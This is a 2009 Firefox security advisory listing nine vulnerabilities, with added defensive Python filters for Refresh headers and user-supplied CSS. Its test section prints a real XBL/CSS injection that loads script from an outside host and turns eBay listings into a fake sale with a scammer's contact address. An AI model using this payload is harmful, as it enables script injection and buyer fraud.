Firefox 3.0.9 update fixes multiple vulnerabilities
Release date: 2009-04-22
Updated: 2009-04-22
Affected systems:
Mozilla Firefox < 3.0.9
Mozilla Thunderbird < 2.0.0.22
Mozilla SeaMonkey < 1.1.17
Unaffected systems:
Mozilla Firefox 3.0.9
Mozilla Thunderbird 2.0.0.22
Mozilla SeaMonkey 1.1.17
Description:
BUGTRAQ ID: 34656
CVE(CAN) ID: CVE-2009-1303,CVE-2009-1306,CVE-2009-1307,CVE-2009-1308,CVE-2009-1309,CVE-2009-1312,CVE-2009-1311,CVE-2009-1302,CVE-2009-1304,CVE-2009-1305,CVE-2009-1310
Firefox is an open-source web browser released by Mozilla.
Multiple security vulnerabilities in Firefox allow a malicious user to disclose sensitive information, bypass security restrictions or compromise the user's system. Because of shared code, Thunderbird and SeaMonkey are also affected by these vulnerabilities.
1) Errors in the layout engine and the JavaScript engine may lead to memory corruption and execution of arbitrary code.
2) If content is served through a jar: scheme-wrapped URI with a Content-disposition: attachment header, the HTTP header is ignored and the content is decompressed and displayed. Sites may rely on this header to protect against untrusted content, so an attacker could use this flaw to bypass that protection.
3) When Flash content is loaded through the view-source: scheme, the Adobe Flash plugin wrongly treats the content's origin as localhost, which leads to two problems:
Flash files can bypass the crossdomain.xml restrictions and initiate HTTP requests to arbitrary third-party sites.
Flash files treated as local resources can read and write local shared objects on the user's machine.
4) Sites that allow users to embed third-party stylesheets are exposed to script injection through XBL bindings.
5) An attacker can use XMLHttpRequest to create a document whose URI does not match its principal; this mismatch can cause principal-based security checks to return wrong results.
6) The __proto__ of XPCNativeWrapper.toString comes from the wrong scope, so calls to that function are executed in the wrong context; if chrome code calls content.toString.call(), an attacker-defined function is executed with chrome privileges.
7) A malicious MozSearch plugin can be created with a javascript: URI as its SearchForm value, which is used as the default landing page when an empty search is performed. If an attacker can trick the user into installing this malicious plugin and performing an empty search, the SearchForm javascript: URI is executed in the currently open page.
8) When an inner frame of a page is saved to a file and the outer page has POST data associated with it, the POST data is wrongly sent to the inner frame's URL, which may send the user's sensitive data to an unintended site.
9) When a server response contains a Refresh header with a javascript: URI, Firefox redirects to the javascript: URI. If an attacker can inject a Refresh header into a server response, or control the value a site sets in its Refresh header, a cross-site scripting attack is possible.
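A server-side check for item 9, added here as an example and not part of the advisory or of Mozilla's fix: it parses a Refresh header value the way a browser would (case-insensitive url=, optional quotes, leading control characters and embedded tabs or newlines stripped) and drops any header whose target is not relative or on an allowed scheme. The helper names and the allow-list are this example's assumptions.

```python
import re
from typing import List, Optional, Tuple

# Added example (not from the advisory): item 9 describes Firefox following a
# javascript: URI given in a Refresh response header. A reverse proxy or
# application middleware can drop such headers before the browser sees them.
# Allow-list and helper names are assumptions of this example.
ALLOWED_SCHEMES = {"http", "https"}
# Browsers trim leading/trailing ASCII whitespace and C0 controls from a URL,
# delete embedded tabs and newlines, and match schemes case-insensitively;
# normalise the same way or "\tjavascript:" and "java\tscript:" slip through.
_CONTROL_WS = "".join(chr(c) for c in range(0x21))
_SCHEME_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")


def refresh_target(header_value: str) -> Optional[str]:
    """Return the navigation target of a Refresh header value, or None."""
    # Grammar: "<seconds>[;|,] [url=]<target>", target optionally quoted.
    parts = re.split(r"[;,]", header_value, maxsplit=1)
    if len(parts) == 1:
        # A bare delay has no target; anything else unparsed is treated as one.
        rest = "" if parts[0].strip(_CONTROL_WS).isdigit() else parts[0]
    else:
        rest = parts[1]
    rest = rest.strip(_CONTROL_WS)
    if rest[:4].lower() == "url=":
        rest = rest[4:].strip(_CONTROL_WS)
    if len(rest) >= 2 and rest[0] in "'\"" and rest[-1] == rest[0]:
        rest = rest[1:-1]
    rest = re.sub(r"[\t\n\r]", "", rest).strip(_CONTROL_WS)
    return rest or None


def refresh_is_safe(header_value: str) -> bool:
    """True if the header has no target, a relative one, or an allowed scheme."""
    target = refresh_target(header_value)
    if target is None:
        return True
    m = _SCHEME_RE.match(target)
    if m is None:
        return True  # relative reference, resolved against the page itself
    return m.group(1).lower() in ALLOWED_SCHEMES


def filter_response_headers(headers: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Drop every Refresh header whose target fails refresh_is_safe()."""
    return [(n, v) for n, v in headers
            if n.lower() != "refresh" or refresh_is_safe(v)]
```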
<*Source: moz_bug_r_a4 (moz_bug_r_a4@yahoo.com)
Igor Bukanov
Gregory Fleischer (gfleischer+bugzilla@gmail.com)
Paolo Amadini
Links: http://www.mozilla.org/security/announce/2009/mfsa2009-22.html
http://www.mozilla.org/security/announce/2009/mfsa2009-21.html
http://www.mozilla.org/security/announce/2009/mfsa2009-20.html
http://www.mozilla.org/security/announce/2009/mfsa2009-19.html
http://www.mozilla.org/security/announce/2009/mfsa2009-18.html
http://www.mozilla.org/security/announce/2009/mfsa2009-17.html
http://www.mozilla.org/security/announce/2009/mfsa2009-16.html
http://www.mozilla.org/security/announce/2009/mfsa2009-14.html
http://secunia.com/advisories/34758/
https://www.redhat.com/support/errata/RHSA-2009-0436.html
https://www.redhat.com/support/errata/RHSA-2009-0437.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
type=text/css rel=stylesheet>
http://petereales.web.officelive.com/Documents/index.htm contains this code...
body { width:
expression(ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html'));
-moz-binding:
url(http://petereales.web.officelive.com/Documents/index.xml#index); }
http://petereales.web.officelive.com/Documents/index.xml#index contains this code...
<?xml version="1.0" encoding="utf-8"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:xbl="http://www.mozilla.org/xbl">
<binding id="index">
<implementation>
<constructor>ebClientServerCallDynamicScriptObject('http://petereales.web.officelive.com/Documents/index.html');</constructor>
</implementation>
</binding>
</bindings>
http://petereales.web.officelive.com/Documents/index.html contains this code...
if (typeof loadt == 'undefined') {
var mail = 'fr33train@gmail.com';
var price = '£3,200.00';
var iit = '1282528736197';
var MA = new Array("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec");
var et = new Date(svrGMT + 3596);
var year = et.getYear();
if (year < 1000)
year += 1900;
year = new String(year);
var cH = et.getHours();
var cM = et.getMinutes();
var cS = et.getSeconds();
function lf() {
var l = document.links;
for (var i = 0; i < l.length; i++) {
if (l[i].href.match(/\d{12}/i) &&
!l[i].href.match(/ebayphotohosting/i)) {
l[i].href = l[i].href.replace(/\d{12}/g, iit);
}
}
var f = document.forms;
for (var i = 0; i < f.length; i++) {
if (f[i].item) {
f[i].item.value = iit;
}
}
try {
document.getElementById("FastVIDetailsBottom").innerHTML = "";
itemId = iit;
} catch(err) {}
try {
tabb = document.getElementsByTagName('table');
for (i = tabb.length - 1; i >= 0; i--) {
if (tabb[i].innerHTML.indexOf('Questions from other members')
!= -1 && i > 1) {
tabb[i - 1].style.display = 'none';
break;
}
}
} catch(err) {}
}
document.getElementById("FastVIPBIBO").getElementsByTagName('table')[1].insertRow(1).insertCell(0).innerHTML = '<img src="http://pics.ebaystatic.com/aw/pics/s.gif" width="5" height="1"><span class="sectiontitle"><nobr><b>Note: This listing is restricted to pre-approved bidder/buyer list.</b></nobr></span><br><span class="standard">Email the seller at ' + mail + ' to buy this item.</span>';
var t1 = document.getElementById("FastVIPDetails").getElementsByTagName('table')[0];
var tr1 = t1.getElementsByTagName('tr');
for (var i = 0; i < tr1.length; i++) {
if (tr1[i].innerHTML.match(/<hr/i)) {
break;
}
}
c = t1.insertRow(i - 1).insertCell(0);
c.colSpan = 4;
c.innerHTML = '<img width="1" height="20" src="http://pics.ebaystatic.com/aw/pics/s.gif"/>';
r = t1.insertRow(i);
r.vAlign = "middle";
c = r.insertCell(0);
c.width = '25%';
c.align = "left";
c.innerHTML = '<span class="titlePurchase"><img align="middle" style="vertical-align: text-bottom;" alt="Buy It Now" src="http://pics.ebaystatic.com/aw/pics/bin_15x54.gif"/> price:</span>';
c = r.insertCell(1);
c.noWrap = 'yes';
c.innerHTML = '<span class="sectiontitle"><b>' + price + '</b></span>';
c = r.insertCell(2);
c.width = '85%';
c.innerHTML = '<button style="padding-right: 0px;" class="VIPriBtn" type="submit"><span class="btn"><span class="btn">Buy It Now ></span></span></button>';
c = t1.insertRow(i + 1).insertCell(0);
c.colSpan = 4;
tr1 = t1.getElementsByTagName('tr');
var nr = new RegExp("(\\d{1,3},\\d{1,3}|\\d{1,3})\\.\\d{2}");
for (var i = tr1.length - 1; i >= 0; i--) {
td1 = tr1[i].getElementsByTagName('td');
for (var j = 0; j < td1.length; j++) {
var ttd = td1[j].innerHTML;
if (ttd.match(/End time/i)) {
td1[j + 1].innerHTML = '<font color="#ff0000" class="sectiontitle"><nobr>59 mins 56 secs</nobr></font> <nobr>(' + MA[et.getMonth()] + "-" + et.getDate() + "-" + year.substr(2, 2) + " " + ((cH < 10) ? "0": "") + cH + ":" + ((cM < 10) ? "0": "") + cM + ":" + ((cS < 10) ? "0": "") + cS + ' PDT)</nobr>';
break;
}
if (ttd.match(nr) && !tr1[i].innerHTML.match(/Buy It Now/)) {
td1[j].innerHTML = ttd.replace(nr, "0.99");
break;
}
if (ttd.match(/(costs:)/i)) {
td1[j + 1].innerHTML = '<b>FREE</b><br>Standard Flat Rate Shipping Service';
break;
}
if (ttd.match(/to:/i)) {
td1[j + 1].innerHTML = 'United Kingdom, United States, Canada';
break;
}
if (ttd.match(/Item location/i)) {
td1[j + 1].innerHTML = 'FREE SHIPPING';
break;
}
if (ttd.match(/History/i)) {
td1[j + 1].innerHTML = td1[j + 1].innerHTML.replace(/(Bidders list|\d+\s[a-z]+)/, "0 Bids", "im");
break;
}
}
if (tr1[i].innerHTML.match(/(Quantity|Cost per item|High bidder)/im)) {
t1.deleteRow(tr1[i].rowIndex);
}
}
var d = document.getElementsByTagName('td');
for (var i = 0; i < d.length; i++) {
if (d[i].innerHTML.match(/<a href="https?:\/\/[\-A-Z0-9+&@#\/%?=~_|!:,.;]*[\-A-Z0-9+&@#\/%=~_|]">Email the seller<\/a>/im)) {
d[i].innerHTML = d[i].innerHTML.replace(/<a href="https?:\/\/[\-A-Z0-9+&@#\/%?=~_|!:,.;]*[\-A-Z0-9+&@#\/%=~_|]">Email the seller<\/a>/im, 'Email the seller: '+mail);
break;
}
if (d[i].innerHTML.match(/\d{12}$/)) {
d[i].innerHTML = d[i].innerHTML.replace(/\d{12}/, iit);
}
}
lf();
ebay.oDocument.oPage.onAfterLoad = lf;
loadt = true;
}
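A defensive counterpart to item 4 and the PoC above, added here as an example (not code from the advisory or from Mozilla): a filter that a site accepting user-supplied stylesheets could apply before serving them, rejecting the two constructs the PoC relies on, -moz-binding and expression(), together with script-scheme and off-site url() references. The policy, the sample stylesheet and its placeholder host are assumptions of this example.

```python
import re

# Added example (not from the advisory): reject user-supplied CSS that can bind
# script to elements. The PoC on this page uses `-moz-binding: url(...)` (XBL)
# and `expression(...)` (IE); both are refused here. Policy is an assumption.
DANGEROUS_PROPERTIES = {"-moz-binding", "behavior", "-ms-behavior"}
DANGEROUS_VALUE_RE = re.compile(
    r"expression\s*\(|url\s*\(\s*['\"]?\s*(?:javascript|data|vbscript)\s*:",
    re.IGNORECASE,
)
# Any url() pointing off-site; a site that serves only its own assets keeps
# this on, one that allows CDN images passes allow_remote_urls=True.
REMOTE_URL_RE = re.compile(r"url\s*\(\s*['\"]?\s*(?:https?:)?//", re.IGNORECASE)

# Constructed sample with the same shape as the PoC stylesheet, placeholder host.
SAMPLE_CSS = """
body { width:
expression(dynamicScript('http://attacker.invalid/index.html'));
-moz-binding:
url(http://attacker.invalid/index.xml#index); }
"""


def _normalise_property(name: str) -> str:
    """Undo CSS escapes (\\2d moz-binding, \\-moz-binding) and drop whitespace."""
    name = re.sub(r"\\([0-9a-fA-F]{1,6})\s?",
                  lambda m: chr(int(m.group(1), 16)), name)
    name = re.sub(r"\\(.)", r"\1", name)
    return re.sub(r"\s+", "", name).lower()


def find_css_violations(css: str, allow_remote_urls: bool = False) -> list:
    """Return (property, value) pairs that violate the policy; [] means clean.

    Declarations are located with a plain name:value scan inside each {...}
    block after comment removal; strict by design, not a full CSS parser.
    """
    violations = []
    body = re.sub(r"/\*.*?\*/", "", css, flags=re.DOTALL)
    for block in re.findall(r"\{([^{}]*)\}", body):
        for decl in block.split(";"):
            if ":" not in decl:
                continue
            raw_name, raw_value = decl.split(":", 1)
            name = _normalise_property(raw_name)
            value = raw_value.strip()
            if name in DANGEROUS_PROPERTIES or DANGEROUS_VALUE_RE.search(value):
                violations.append((name, value))
            elif not allow_remote_urls and REMOTE_URL_RE.search(value):
                violations.append((name, value))
    return violations
```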
Recommendations:
Vendor patches:
Mozilla
-------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:
http://www.mozilla.org/
RedHat
------
RedHat has released a security advisory (RHSA-2009:0437-02) and corresponding patches:
RHSA-2009:0437-02: Critical: seamonkey security update
Link: https://www.redhat.com/support/errata/RHSA-2009-0437.html
